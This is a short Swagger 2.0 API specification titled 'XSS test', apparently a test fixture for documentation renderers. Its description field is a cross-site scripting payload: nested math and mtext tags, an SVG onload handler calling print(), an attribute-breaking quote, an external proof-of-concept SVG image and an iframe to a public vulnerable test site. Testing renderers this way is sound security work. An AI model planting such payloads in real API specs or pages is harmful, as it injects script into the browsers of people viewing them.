swagger: '2.0'
info:
  title: XSS test
  description: <math><mtext><h1>hello<br><a href="https://google.com">google</a><br><svg onload=print()><br>"><img src="https://brutelogic.com.br/poc.svg"><iframe src="http://testphp.vulnweb.com/">
  version: production
